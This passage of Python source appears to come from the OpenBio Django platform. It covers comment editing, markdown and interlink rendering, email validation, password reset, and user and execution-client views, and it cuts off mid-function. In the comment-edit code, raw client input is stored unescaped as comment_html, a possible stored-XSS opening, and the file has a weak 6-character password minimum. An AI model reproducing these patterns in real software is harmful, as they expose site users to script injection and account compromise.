        # input into .comment_html — confirm whether the client really sends
        # markdown source in 'new_html'.
        comment.comment = markdown(new_html)
        comment.comment_html = new_html
        # Optionally update the opinion tag if a valid one was sent
        if comment_type in ['solution', 'note', 'agree', 'disagree']:
            comment.opinion = comment_type
    else:
        # Root comments: only the title is editable
        comment.title = new_html
    comment.save()
    ret = {
        'message': 'The comment has been updated!'
    }
    return success(ret)
### END OF Q&A
### VIEWS END ######
# Django imports
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.conf import settings # Access to project settings
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib.auth import login as django_login # To distinguish from AJAX called login
from django.contrib.auth import logout as django_logout # To distinguish from AJAX called logout
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.core.validators import URLValidator
from django.core.mail import send_mail
from django.db.models import Q # https://docs.djangoproject.com/en/2.1/topics/db/queries/#complex-lookups-with-q-objects
from django.db.models import Max # https://docs.djangoproject.com/en/2.1/topics/db/aggregation/
from django.db.models import Count # https://stackoverflow.com/questions/7883916/django-filter-the-model-on-manytomany-count
from django.utils import timezone
#from django.utils.html import escape # https://docs.djangoproject.com/en/2.2/ref/utils/#module-django.utils.html
from django.views.decorators.csrf import csrf_exempt # https://stackoverflow.com/questions/17716624/django-csrf-cookie-not-set/51398113
# Get csrf_token
# https://stackoverflow.com/questions/3289860/how-can-i-embed-django-csrf-token-straight-into-html
from django.middleware.csrf import get_token
#Import database objects
from app.models import OBC_user, Tool, Workflow, Variables, ToolValidations, \
OS_types, Keyword, Report, ReportToken, Reference, ReferenceField, Comment, \
UpDownCommentVote, UpDownToolVote, UpDownWorkflowVote, ExecutionClient
from app.models import create_nice_id
#Import executor
from ExecutionEnvironment.executor import create_bash_script, OBC_Executor_Exception
# Email imports
import smtplib
from email.message import EmailMessage
# System imports
import io
import os
import re
import six
import time # for time.sleep
import uuid
import hashlib
#import datetime # Use timezone.now()
import logging # https://docs.djangoproject.com/en/2.1/topics/logging/
from collections import Counter, defaultdict
import urllib.parse # https://stackoverflow.com/questions/40557606/how-to-url-encode-in-python-3/40557716
# Installed packages imports
import simplejson
from ansi2html import Ansi2HTMLConverter # https://github.com/ralphbean/ansi2html/
#https://pybtex.org/
from pybtex.database import parse_string as parse_reference_string
import pybtex.database.input.bibtex
import pybtex.plugin
import requests # Used in DOI resolution
# https://github.com/lepture/mistune
import mistune
# Application version string (exposed to the template via the index view)
__version__ = '0.1.7rc'
# Get an instance of a logger
logger = logging.getLogger(__name__)
#GLOBAL CONSTANTS
# g: module-wide configuration and shared singletons -- server/email
# addresses, jstree tree ids, cached converter/markdown instances,
# per-dev-instance settings and URL-builder lambdas for the OBC client.
g = {
    'SERVER': 'https://www.openbio.eu',
    'EMAIL': 'info@swww.openbio.eu', # NOTE(review): 'swww' looks like a typo for 'www' -- confirm before changing (runtime value, not altered here)
    'ADMIN': 'kantale@ics.forth.gr', # In case the email fail, use this instead
    'DEFAULT_DEBUG_PORT': 8200,
    # jstree tree ids: each left-panel tree gets a distinct numeric id
    'SEARCH_TOOL_TREE_ID': '1',
    'DEPENDENCY_TOOL_TREE_ID': '2',
    'VARIABLES_TOOL_TREE_ID': '3',
    'SEARCH_WORKFLOW_TREE_ID': '4',
    'SEARCH_REPORT_TREE_ID': '5',
    'format_time_string' : '%a, %d %b %Y %H:%M:%S', # RFC 2822 Internet email standard. https://docs.python.org/2/library/time.html#time.strftime # '%Y-%m-%d, %H:%M:%S'
    # Per-development-instance settings, keyed by the uuid stored in id.txt
    # (see get_instance_settings)
    'instance_settings' : {
        'cb62fc6f-f203-4525-bf40-947cbf51bda3': {
            'port': 8200,
            'controller_url': 'http://139.91.190.79:8080/post',
        },
        '341422c9-36c4-477e-81b7-26a76c77dd9a': {
            'port': 8201,
            'controller_url': 'http://139.91.190.79:8081/post'
        },
        'default': {
            'port': 8200,
            'controller_url': 'http://139.91.190.79:8080/post',
        },
    },
    # Flag so the "id.txt not found" warning is logged only once
    'instance_setting_not_found_printed': False,
    'ansi2html_converter': Ansi2HTMLConverter(), # https://github.com/ralphbean/ansi2html/
    'markdown': mistune.Markdown(escape=True), # If you care about performance, it is better to re-use the Markdown instance:
    # escape=True should be the default option for mistune...
    # 'pybtex': {
    #     'pybtex_style': pybtex.plugin.find_plugin('pybtex.style.formatting', 'plain')(),
    #     'pybtex_html_backend': pybtex.plugin.find_plugin('pybtex.backends', 'html')(),
    #     'pybtex_parser': pybtex.database.input.bibtex.Parser()
    # }
    # materialize js tree icons
    # https://materializecss.com/icons.html
    'jstree_icons': {
        'tools': 'settings',
        'variables': 'chevron_right', # Tool variables
        'workflows': 'device_hub',
        'reports': 'description',
        'references': 'link',
        'users': 'person',
        'qas': 'forum',
    },
    'url_validator': URLValidator(), # Can be customized: URLValidator(schemes=('http', 'https', 'ftp', 'ftps', 'rtsp', 'rtmp'))
    'client_name_regex': r'^[\w]+$', # The regular expression to validate the name of execution client
    'client_max': 10, # Max number of execution clients
    # Create the URL for the report generated in the OBC client
    'create_client_download_report_url': lambda client_url, nice_id : urllib.parse.urljoin(client_url + '/', 'download/{NICE_ID}'.format(NICE_ID=nice_id)),
    'create_client_download_log_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'logs/{NICE_ID}'.format(NICE_ID=nice_id)),
    'create_client_check_status_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'check/id/{NICE_ID}'.format(NICE_ID=nice_id)),
    'create_client_pause_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/{NICE_ID}/paused/true'.format(NICE_ID=nice_id)),
    'create_client_resume_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/{NICE_ID}/paused/false'.format(NICE_ID=nice_id)),
    'create_client_abort_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/delete/{NICE_ID}'.format(NICE_ID=nice_id)),
    'create_client_airflow_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'admin/airflow/graph?dag_id={NICE_ID}&execution_date='.format(NICE_ID=nice_id)),
}
### HELPING FUNCTIONS AND DECORATORS #####
def md5(t):
    '''
    Return the hex md5 digest of a (unicode) string.
    '''
    digest = hashlib.md5(t.encode("utf-8"))
    return digest.hexdigest()
def valid_url(url):
    '''
    True when url passes django's URLValidator, else False.
    '''
    validator = g['url_validator']
    try:
        validator(url)
        return True
    except ValidationError:
        return False
def user_is_validated(request):
    '''
    Has the logged-in user's email been validated?
    Anonymous or unknown users count as not validated.
    '''
    if request.user.is_anonymous:
        return False
    try:
        return OBC_user.objects.get(user=request.user).email_validated
    except ObjectDoesNotExist:
        # Should never happen: every auth User has an OBC_user record
        return False
def resolve_doi(doi):
    '''
    Return a bibTeX string of metadata for a given DOI, or None on failure.
    https://gist.github.com/jrsmith3/5513926
    Used in references_process_doi
    '''
    url = "http://dx.doi.org/" + doi
    headers = {"accept": "application/x-bibtex"}
    # A timeout prevents the calling view from hanging forever when doi.org
    # is slow or unreachable; network failures map to the documented None.
    try:
        r = requests.get(url, headers=headers, timeout=15)
    except requests.RequestException:
        return None
    if r.status_code == requests.codes.ok:
        return r.text
    return None
def replace_interlinks(text):
    '''
    Replace OBC interlinks found in text (t/ d/ w/ r/ u/ c/ references)
    with <a> tags that invoke window.OBCUI.interlink() on the client.
    Only interlinks whose target actually exists in the database are replaced.
    '''
    ret = text
    def javascript_call(matched_string, arguments):
        '''
        Build the replacement <a> tag whose onclick calls OBCUI.interlink
        with the parsed arguments (JSON-encoded).
        '''
        func_call = '''window.OBCUI.interlink({});'''.format(simplejson.dumps(arguments))
        pattern = '''<a href="javascript:void(0);" onclick='{}'>{}</a>'''.format(func_call, matched_string)
        return pattern
    # Per interlink kind: 'findall' captures candidate substrings,
    # 'arguments' names their parts, 'exists' checks the target in the DB.
    interlink_options = {
        'tools': {
            'findall': r'[^\w]([td]/[\w]+/[\w\.]+/[\d]+)',
            'arguments': r'(?P<type>[td])/(?P<name>[\w]+)/(?P<version>[\w\.]+)/(?P<edit>[\d]+)',
            'exists': lambda arguments: Tool.objects.filter(name__iexact=arguments['name'], version__iexact=arguments['version'], edit=int(arguments['edit'])).exists()
        },
        'workflows': {
            'findall': r'[^\w](w/[\w]+/[\d]+)',
            'arguments': r'(?P<type>w)/(?P<name>[\w]+)/(?P<edit>[\d]+)',
            'exists': lambda arguments: Workflow.objects.filter(name__iexact=arguments['name'], edit=int(arguments['edit'])).exists()
        },
        'references': {
            'findall': r'[^\w](r/[\w]+)',
            'arguments': r'(?P<type>r)/(?P<name>[\w]+)',
            'exists': lambda arguments: Reference.objects.filter(name__iexact=arguments['name']).exists()
        },
        'users': {
            'findall': r'[^\w](u/[\w]+)',
            'arguments': r'(?P<type>u)/(?P<username>[\w]+)',
            'exists': lambda arguments: OBC_user.objects.filter(user__username__iexact=arguments['username']).exists()
        },
        'comment': {
            'findall': r'[^\w](c/[\d]+)',
            'arguments': r'(?P<type>c)/(?P<id>[\d]+)',
            'exists': lambda arguments: Comment.objects.filter(pk=int(arguments['id'])).exists()
        }
    }
    for interlink_key, interlink_value in interlink_options.items():
        calls = set(re.findall(interlink_value['findall'], ' ' + text)) # We add a space (' ') so that we catch interlinks at the beginning of string
        for call in calls:
            #print ('call:', call)
            #print ('regexp:', interlink_value['arguments'])
            arguments = re.search(interlink_value['arguments'], call).groupdict()
            if interlink_value['exists'](arguments):
                # str.replace swaps every occurrence of this interlink at once
                ret = ret.replace(call, javascript_call(call, arguments))
    # tool_calls = set(re.findall(interlink_options['tools']['findall'], text))
    # for tool_call in tool_calls:
    #     arguments = re.search(interlink_options['tools']['arguments'], tool_call).groupdict()
    #     # Does this tool exists?
    #     if Tool.objects.filter(name=arguments['name'], version=arguments['version'], edit=arguments['edit']).exists():
    #         ret = ret.replace(tool_call, javascript_call(tool_call, arguments))
    return ret
def markdown(t):
    '''
    Render markdown text to HTML with mistune, strip the outer <p> wrapper
    (when the output is a single paragraph) and expand OBC interlinks.
    https://github.com/lepture/mistune
    '''
    rendered = g['markdown'](t)
    # mistune wraps a single paragraph in <p>...</p>\n -- unwrap it
    match = re.search(r'^<p>(.*)</p>\n$', rendered, re.M | re.S)
    unwrapped = match.group(1) if match else rendered
    # Check for interlinks
    return replace_interlinks(unwrapped)
def jstree_icon_html(t):
    '''
    HTML <i> tag for the materialize icon associated with node type t.
    '''
    icon_name = g['jstree_icons'][t]
    return '<i class="material-icons jsTreeMaterialIcons left md-18">{}</i>'.format(icon_name)
def fail(error_message=None):
    '''
    Build the JSON response of a failed AJAX request.
    '''
    payload = simplejson.dumps({'success': False, 'error_message': error_message})
    return HttpResponse(payload, content_type='application/json')
def success(data=None):
    '''
    Build the JSON response of a successful AJAX request.

    data: optional dict payload; a 'success': True flag is added before
    serialization. The default is None instead of the original mutable {}
    default, which was mutated on every no-argument call (shared-default
    pitfall); passing None is backward-compatible for all callers.
    '''
    if data is None:
        data = {}
    data['success'] = True
    json = simplejson.dumps(data)
    return HttpResponse(json, content_type='application/json')
def has_data(f):
    '''
    Decorator that forwards AJAX request data to the wrapped view as
    keyword arguments: form-encoded POST fields, a JSON POST body, or
    GET query parameters.
    '''
    from functools import wraps  # local import keeps the module header untouched

    @wraps(f)  # preserve the view's __name__/__doc__ for debugging/introspection
    def wrapper(*args, **kwargs):
        request = args[0]
        if request.method == 'POST':
            if len(request.POST):
                # Classic form-encoded POST data
                for k in request.POST:
                    kwargs[k] = request.POST[k]
            else:
                # Empty request.POST: assume a JSON-encoded body
                try:
                    POST = simplejson.loads(request.body)
                except simplejson.errors.JSONDecodeError:
                    return fail('Could not parse JSON data')
                for k in POST:
                    kwargs[k] = POST[k]
        elif request.method == 'GET':
            for k in request.GET:
                kwargs[k] = request.GET[k]
        return f(*args, **kwargs)
    return wrapper
def username_exists(username):
    '''
    True when a user with this username (case-insensitive) already exists.
    '''
    matches = User.objects.filter(username__iexact=username)
    return matches.exists()
def datetime_to_str(d):
    '''
    Format a datetime with the application-wide time format string.
    '''
    fmt = g['format_time_string']
    return d.strftime(fmt)
def convert_ansi_to_html(ansi):
    '''
    Render ANSI terminal output (stdout) as a standalone HTML page.
    https://github.com/ralphbean/ansi2html/
    '''
    converter = g['ansi2html_converter']
    return converter.convert(ansi)
def create_uuid_token():
    '''
    Create a 32-character hex token for email validation:
    a uuid4 without the dashes (uuid4().hex).
    '''
    # return str(uuid.uuid4()).split('-')[-1] # Last part: 12 characters
    token = uuid.uuid4()
    return token.hex  # 32 characters, identical to str(uuid4).replace('-', '')
def uuid_is_valid(uuid_token):
    '''
    Check whether uuid_token is a well-formed version-4 UUID.
    https://gist.github.com/ShawnMilo/7777304
    '''
    try:
        parsed = uuid.UUID(uuid_token, version=4)
    except ValueError:
        return False
    # UUID(..., version=4) forces the version/variant bits, so comparing the
    # canonical hex back against the input rejects non-v4 tokens.
    return parsed.hex == uuid_token.replace('-', '')
def send_mail_smtplib(from_, to, subject, body):
    '''
    Standard email send function with SMTP.
    Adjusted from here:
    https://docs.python.org/3/library/email.examples.html
    NOT USED!
    '''
    msg = EmailMessage()
    msg.set_content(body)
    msg['Subject'] = subject
    msg['From'] = from_
    msg['To'] = to
    # Context manager guarantees QUIT/close even if send_message raises
    # (the original leaked the connection on error).
    with smtplib.SMTP('localhost') as s:  # Send the message via our own SMTP server.
        s.send_message(msg)
def request_port_to_url(request):
    '''
    Return the ':<port>' suffix to append to URLs, or '' when the request
    arrived on a default port (80 http / 443 https).
    '''
    port = request.META['SERVER_PORT']  # This is a string
    # Default ports are implicit in URLs -- no suffix needed
    return '' if port in ('80', '443') else ':' + port
def create_validation_url(token, port=''):
    '''
    Build the email-validation URL that is mailed to new users.
    https://stackoverflow.com/a/5767509/5626738
    FIXME: "platform" should be derived from request.
    SEE: https://stackoverflow.com/questions/2491605/how-to-get-the-current-url-name-using-django
    '''
    template = '{server}{port}/platform/?validation_token={token}'
    return template.format(server=g['SERVER'], token=token, port=port)
def create_password_email_url(token, port=''):
    '''
    Build the password-reset URL that is mailed to users.
    See also create_validation_url for the FIXME issue.
    '''
    template = '{server}{port}/platform/?password_reset_token={token}'
    return template.format(server=g['SERVER'], token=token, port=port)
def confirm_email_body(token, port=''):
    '''
    The mail verification mail body.
    token: the email-validation uuid token; port: optional ':<port>' suffix
    (see request_port_to_url). {server}/{validation_url} are filled in below.
    '''
    ret = '''
Thank you for signing up to {server}
To complete your registration please click (or copy-paste to your browser) the following link:
{validation_url}
Regards,
The openbio.eu admin team.
'''
    return ret.format(server=g['SERVER'], validation_url=create_validation_url(token, port))
def reset_password_email_body(token, port=''):
    '''
    The email body for resetting a password.
    token: the password-reset uuid token; port: optional ':<port>' suffix.
    '''
    ret = '''
Dear user,
Someone (hopefully you) has requested to reset the password at {server} .
If this is you, please go to the following link to complete the process:
{password_reset_url}
Otherwise please ignore this email!
Regards,
The openbio.eu admin team.
'''
    return ret.format(server=g['SERVER'], password_reset_url=create_password_email_url(token, port))
def validate_user(token):
    '''
    Validate the user owning this email-validation token.
    Returns: (True/False, message)
    '''
    try:
        obc_user = OBC_user.objects.get(email_validation_token=token)
    except ObjectDoesNotExist:
        return False, 'Unknown or deleted email validation token'
    if obc_user.email_validated:
        return False, "User's email is already validated"
    # Mark as validated and burn the one-shot token
    obc_user.email_validated = True
    obc_user.email_validation_token = None
    obc_user.save()
    return True, 'Email successfully validated'
def password_reset_check_token(token):
    '''
    Look up and age-check a password-reset token.
    Returns (success, error_message, obc_user_or_None).
    '''
    try:
        obc_user = OBC_user.objects.get(password_reset_token=token)
    except ObjectDoesNotExist:
        return False, "Unknown token", None
    age_seconds = (now() - obc_user.password_reset_timestamp).total_seconds()
    if age_seconds > 3600 * 2:  # 2 Hours
        return False, 'Password Reset Token expires after 2 Hours', None
    return True, '', obc_user
def now():
    '''
    Return the current timezone-aware datetime.
    Used instead of datetime.datetime.now() to avoid Django's
    naive-datetime warnings on DateTimeFields.
    https://stackoverflow.com/a/415519/5626738
    https://stackoverflow.com/questions/18622007/runtimewarning-datetimefield-received-a-naive-datetime
    '''
    #return datetime.datetime.now()
    return timezone.now()
def check_password(password):
    '''
    Validate password strength. Returns (ok, error_message).
    '''
    if len(password) >= 6:
        return True, ''
    return False, 'Minimum password length is 6'
def send_validation_email_inner(request, email):
    '''
    Send an email validation email.
    Returns (success, error_message, uuid_token).
    '''
    uuid_token = create_uuid_token()
    if settings.DEBUG:
        # In DEBUG we skip real delivery; the token alone suffices locally
        return True, '', uuid_token
    try:
        send_mail(
            '[{server}] Please confirm your email'.format(server=g['SERVER']),  # subject
            confirm_email_body(uuid_token, port=request_port_to_url(request)),  # body message
            g['EMAIL'],  # Sender, FROM
            [email],  # List of recipients
        )
    except Exception:
        message = 'Could not send an email to {email}. Contact {ADMIN}'.format(email=email, ADMIN=g['ADMIN'])
        return False, message, None  # Better to add None
    return True, '', uuid_token
def None_if_empty_or_nonexisting(d, key):
    '''
    Return the stripped value of d[key], or None when the key is missing
    or the stripped value is empty. Useful for normalizing Ajax input.
    '''
    if key not in d:
        return None
    stripped = d[key].strip()
    return stripped if stripped else None
def tool_to_json(tool):
    '''
    Serialize a tool to a minimal JSON-friendly dict (falsy passes through as None).
    '''
    if not tool:
        return None
    return dict(name=tool.name, version=tool.version, edit=tool.edit)
def workflow_to_json(workflow):
    '''
    Serialize a workflow to a minimal JSON-friendly dict (falsy passes through as None).
    '''
    if not workflow:
        return None
    return dict(name=workflow.name, edit=workflow.edit)
def tool_text_jstree(tool):
    '''
    jstree display text of a tool: "name/version/edit".
    The id should have 4 fields.
    '''
    parts = [tool.name, tool.version, tool.edit]
    return '/'.join(str(p) for p in parts)
def tool_node_jstree(tool):
    '''
    The HTML for a jstree node that contains a tool.
    BUGFIX: the original return statement ended with a stray trailing comma,
    which made this function return a 1-element tuple instead of the HTML
    string (compare with workflow_node_jstree, which returns a string).
    '''
    return tool_text_jstree(tool) + (' <span class="red lighten-3">DRAFT</span>' if tool.draft else '') + jstree_icon_html('tools')
def workflow_text_jstree(workflow):
    '''
    jstree display text of a workflow: "name/edit".
    '''
    return '{}/{}'.format(workflow.name, workflow.edit)
def workflow_node_jstree(workflow):
    '''
    The HTML for a jstree node that contains a workflow.
    '''
    draft_badge = ' <span class="red lighten-3">DRAFT</span>' if workflow.draft else ''
    return workflow_text_jstree(workflow) + draft_badge + jstree_icon_html('workflows')
def report_text_jstree(report):
    '''
    jstree display text of a report: "<workflow text>/<nice_id>".
    '''
    workflow_part = workflow_text_jstree(report.workflow)
    return workflow_part + '/' + report.nice_id
def tool_id_jstree(tool, id_):
    '''
    jstree node id of a tool: a JSON list so it can carry many fields.
    '''
    #return tool_text_jstree(tool) + '/' + str(id_)
    fields = [tool.name, tool.version, str(tool.edit), str(id_)]
    return simplejson.dumps(fields)
def tool_id_cytoscape(tool):
    '''
    cytoscape node id of a tool. Accepts a Tool instance or a plain dict.
    '''
    if isinstance(tool, Tool):
        parts = [tool.name, tool.version, str(tool.edit)]
    elif type(tool) is dict:
        parts = [tool['name'], tool['version'], str(tool['edit'])]
    else:
        raise Exception('Error: 8151')
    return '__'.join(parts + [g['DEPENDENCY_TOOL_TREE_ID']])
def step_id_cytoscape(step_name, workflow, name, edit):
    '''
    cytoscape node id of a workflow step.
    '''
    return '__'.join(['step', step_name, workflow_id_cytoscape(workflow, name, edit)])
def step_id_label(step_name):
    '''
    cytoscape step label (currently the bare step name, unchanged)
    '''
    return step_name
def tool_label_cytoscape(tool):
    '''
    cytoscape display label of a tool ("name/version/edit").
    Accepts a Tool instance or a plain dict.
    '''
    if isinstance(tool, Tool):
        parts = [tool.name, tool.version, str(tool.edit)]
    elif type(tool) is dict:
        parts = [tool['name'], tool['version'], str(tool['edit'])]
    else:
        raise Exception('Error: 9810')
    return '/'.join(parts)
def workflow_id_cytoscape(workflow, name, edit):
    '''
    cytoscape node id of a workflow. Accepts a dict, a model-like object,
    or (when workflow is falsy) explicit name/edit values.
    '''
    if type(workflow) is dict:
        return '{}__{}'.format(workflow['name'], workflow['edit'])
    if workflow:
        return '{}__{}'.format(workflow.name, workflow.edit)
    return '{}__{}'.format(name, edit)
def workflow_label_cytoscape(workflow, name, edit):
    '''
    cytoscape display label of a workflow ("name/edit"); falls back to
    the explicit name/edit arguments when workflow is falsy.
    '''
    if workflow:
        return '{}/{}'.format(workflow.name, workflow.edit)
    return '{}/{}'.format(name, edit)
def workflow_id_jstree(workflow, id_):
    '''
    jstree node id of a workflow: a JSON list so it can carry many fields.
    '''
    fields = [workflow.name, str(workflow.edit), str(id_)]
    return simplejson.dumps(fields)
def report_id_jstree(report, id_):
    '''
    jstree node id of a report: a JSON list so it can carry many fields.
    '''
    fields = [report.workflow.name, str(report.workflow.edit), str(report.nice_id), str(id_)]
    return simplejson.dumps(fields)
def tool_variable_node_jstree(variable):
    '''
    jstree display text of a tool variable ("name:description" + icon).
    '''
    label = '{}:{}'.format(variable.name, variable.description)
    return label + jstree_icon_html('variables')
def tool_variable_id_jstree(variable, tool, id_):
    '''
    jstree node id of a variable: a JSON list carrying the variable's
    fields, the tree id and the owning tool's identity.
    '''
    #return variable.name + '/' + variable.value + '/' + variable.description + '/' + str(id_)
    fields = [
        variable.name, variable.value, variable.description,
        str(id_),
        tool.name, tool.version, tool.edit,
    ]
    return simplejson.dumps(fields)
def tool_get_dependencies_internal(tool, include_as_root=False):
    '''
    Flatten the recursive dependency tree of a tool into a list of
    {'dependant': ..., 'dependency': ...} edges (depth-first).
    include_as_root: also emit a root edge {'dependant': None, 'dependency': tool}
    ('dependant' needs dependencies..).
    '''
    edges = [{'dependant': None, 'dependency': tool}] if include_as_root else []
    for dep in tool.dependencies.all():
        edges.append({
            'dependant': tool,
            'dependency': dep
        })
        # Recurse into the dependency's own dependencies
        edges.extend(tool_get_dependencies_internal(dep, include_as_root=False))
    return edges
def tool_build_dependencies_jstree(tool_dependencies, add_variables=False, add_installation_commands=False):
    '''
    Build a jstree node list from the edge list produced by
    tool_get_dependencies_internal.

    tool_dependencies: list of {'dependant': Tool|None, 'dependency': Tool} edges
    add_variables: Also add tool/data variables as child nodes
    add_installation_commands: All installation_commands + validation_commands + os_choices
    ATTENTION: THIS IS NOT GENERIC!!!
    IT uses g['DEPENDENCY_TOOL_TREE_ID'].
    '''
    tool_dependencies_jstree = []
    for tool_dependency in tool_dependencies:
        to_append = {
            'data': {
                # 'name': tool_dependency['dependency'].name,
                # 'version': tool_dependency['dependency'].version,
                # 'edit': tool_dependency['dependency'].edit,
                'type': 'tool',
            },
            'text': tool_node_jstree(tool_dependency['dependency']), # tool_text_jstree(tool_dependency['dependency']), # This is what is shown on the tree
            'cy_label': tool_label_cytoscape(tool_dependency['dependency']), # Label to show in the cytoscape graph
            'id': tool_id_jstree(tool_dependency['dependency'], g['DEPENDENCY_TOOL_TREE_ID']), # This is a unique id
            # Root edges (dependant None) hang from the jstree root '#'
            'parent': tool_id_jstree(tool_dependency['dependant'], g['DEPENDENCY_TOOL_TREE_ID']) if tool_dependency['dependant'] else '#',
            'type': 'tool', ### This is redundant with ['data']['type'], but we need it because
                            ### The node[0].data.type is checked in $scope.tools_var_jstree_model.
                            ### See also issue #93
            'name': tool_dependency['dependency'].name,
            'version': tool_dependency['dependency'].version,
            'edit': tool_dependency['dependency'].edit,
            'draft': tool_dependency['dependency'].draft,
        }
        if add_installation_commands:
            to_append['installation_commands'] = tool_dependency['dependency'].installation_commands
            to_append['validation_commands'] = tool_dependency['dependency'].validation_commands
            to_append['os_choices'] = [choice.os_choices for choice in tool_dependency['dependency'].os_choices.all()]
            to_append['dependencies'] = [str(t) for t in tool_dependency['dependency'].dependencies.all()]
        tool_dependencies_jstree.append(to_append)
        # Add the variables of this tool (as children of the tool node)
        if add_variables:
            for variable in tool_dependency['dependency'].variables.all():
                tool_dependencies_jstree.append({
                    'data': {
                        'type': 'variable',
                        'name': variable.name,
                        'value': variable.value,
                        'description': variable.description,
                    },
                    'text': tool_variable_node_jstree(variable),
                    'id': tool_variable_id_jstree(variable, tool_dependency['dependency'], g['VARIABLES_TOOL_TREE_ID']),
                    'parent': tool_id_jstree(tool_dependency['dependency'], g['DEPENDENCY_TOOL_TREE_ID']),
                    'type': 'variable', # TODO: FIX REDUNDANCY WITH ['data']['type']
                })
    return tool_dependencies_jstree
### HELPING FUNCTIONS AND DECORATORS END #######
### VIEWS ############
def get_instance_settings():
    '''
    Return the settings dict of this local installation.
    We run multiple development server instances; each reads its own id
    from id.txt and gets its own port / controller URL. Falls back to the
    'default' entry (warning logged only once) when id.txt is missing.
    '''
    if os.path.exists('id.txt'):
        with open('id.txt') as handle:
            instance_id = handle.read().strip()
        return g['instance_settings'][instance_id]
    # id.txt missing: warn once, then use defaults
    if not g['instance_setting_not_found_printed']:
        logger.warning('Could not find id.txt setting default')
        g['instance_setting_not_found_printed'] = True
    return g['instance_settings']['default']
### USERS
@has_data
def users_search_3(request, **kwargs):
    '''
    Get profile info for a single user.
    This is called from:
    * Click on profile
    * Click on a user node in left panel jstree
    Private fields (email, execution clients) are returned only when the
    requested profile belongs to the requesting user.
    '''
    username = kwargs.get('username', '')
    if not username:
        return fail('Could not get username')
    try:
        u = OBC_user.objects.get(user__username__iexact=username)
    except ObjectDoesNotExist as e:
        return fail('Could not find user with this username')
    ret = {
        'profile_username': username,
        'profile_firstname': u.first_name,
        'profile_lastname': u.last_name,
        'profile_website': u.website,
        'profile_affiliation': u.affiliation,
        'profile_publicinfo': u.public_info,
        'profile_created_at': datetime_to_str(u.user.date_joined), # https://docs.djangoproject.com/en/2.2/ref/contrib/auth/#django.contrib.auth.models.User.date_joined
    }
    # only for registered user:
    # * get mail
    # * get ExecutionClients
    if username == request.user.username:
        ret['profile_email'] = u.user.email
        ret['profile_clients'] = [{'name': client.name, 'client': client.client} for client in u.clients.all()]
    else:
        ret['profile_email'] = ''
    return success(ret)
@has_data
def user_add_client(request, **kwargs):
    '''
    Called from $scope.profile_add_client when user adds a new Execution Client
    URL: user_add_client/
    Validates the client name (regex) and URL, enforces per-user uniqueness
    and the maximum count, then stores the new ExecutionClient and returns
    the refreshed client list.
    '''
    # Get the user
    try:
        obc_user = OBC_user.objects.get(user=request.user)
    except ObjectDoesNotExist:
        return fail('Error 8619'); # This should never happen
    #Get and validate the name
    name = kwargs.get('name', '')
    if not re.match(g['client_name_regex'], name):
        return fail('Invalid client name (allowed characters, a-z, A-Z, 0-9, _)')
    # Get and validate the client
    client = kwargs.get('client', '')
    if not valid_url(client):
        return fail('URL is invalid')
    # Check that the name and the client does not exist and that maximum number has not been reached
    existing_clients = [{'name':x.name, 'client': x.client} for x in obc_user.clients.all()]
    if len(existing_clients) >= g['client_max']:
        return fail('Maximum number of Execution Clients has been reached')
    existing_names = {x['name'] for x in existing_clients}
    existing_urls = {x['client'] for x in existing_clients}
    if name in existing_names:
        return fail('There is already an Execution Client with this name')
    if client in existing_urls:
        return fail('There is already an Execution Client with this URL')
    ## Add the execution environment
    new_execution_client = ExecutionClient(name=name, client=client)
    new_execution_client.save()
    obc_user.clients.add(new_execution_client)
    # Return all the profile clients
    # (note: the loop variable 'client' below shadows the URL read above)
    ret = {
        'profile_clients' : [{'name': client.name, 'client': client.client} for client in obc_user.clients.all()]
    }
    obc_user.save()
    return success(ret)
@has_data
def user_delete_client(request, **kwargs):
    '''
    Remove one of the user's Execution Clients by name.
    Called from $scope.profile_delete_client
    URL: user_delete_client
    '''
    name = kwargs.get('name', '')
    if not name:
        return fail('Error 3498')
    # Get the user
    try:
        obc_user = OBC_user.objects.get(user=request.user)
    except ObjectDoesNotExist:
        return fail('Error 8686')  # This should never happen
    # Get the Execution Client
    try:
        client_to_delete = ExecutionClient.objects.get(obc_user=obc_user, name=name)
    except ObjectDoesNotExist:
        return fail('Error 4555')
    # Delete the Execution Client
    client_to_delete.delete()
    # Report back the remaining clients so the UI can refresh
    remaining = [{'name': c.name, 'client': c.client} for c in obc_user.clients.all()]
    return success({'profile_clients': remaining})
@has_data
def users_edit_data(request, **kwargs):
    '''
    Called by users_edit_data/
    Edit user's profile data (first/last name, website, affiliation,
    public info). Responds with the refreshed profile via users_search_3.
    '''
    username = kwargs.get('username', '')
    if not username:
        return fail('Could not get username')
    try:
        obc_user = OBC_user.objects.get(user__username=username)
    except ObjectDoesNotExist as e:
        return fail('Could not find user with this username')
    obc_user.first_name = kwargs.get('profile_firstname', '')
    obc_user.last_name = kwargs.get('profile_lastname', '')
    website = kwargs.get('profile_website', '')
    if website:
        # Validate only when a website was actually supplied
        if not valid_url(website):
            return fail('website is not a valid URL')
    obc_user.website = website
    obc_user.affiliation = kwargs.get('profile_affiliation', '')
    obc_user.public_info = kwargs.get('profile_publicinfo', '')
    #Save edits
    obc_user.save()
    #Confirm by getting new data
    return users_search_3(request, **kwargs)
def users_search_2(main_search):
    '''
    Collect all users matching the main search: case-insensitive substring
    match against username, affiliation or public info. Returns the count
    and the jstree node list for the left panel.
    '''
    query = (
        Q(user__username__icontains=main_search)
        | Q(affiliation__icontains=main_search)
        | Q(public_info__icontains=main_search)
    )
    results = OBC_user.objects.filter(query)
    users_search_jstree = [
        {
            'data': {'username': result.user.username},
            'text': result.user.username + jstree_icon_html('users'),
            'id': result.user.username,
            'parent': '#',
            'state': {'opened': True},
        }
        for result in results
    ]
    return {
        'main_search_users_number': results.count(),
        'users_search_jstree': users_search_jstree,
    }
def get_scheme(request):
    '''
    Return 'https' when the request is secure, otherwise 'http'.
    https://stackoverflow.com/a/36817763/5626738
    '''
    if request.is_secure():
        return 'https'
    return 'http'
def get_server_url(request):
    '''
    Absolute URL of this server's /platform endpoint.
    '''
    scheme = get_scheme(request)
    host = request.get_host()
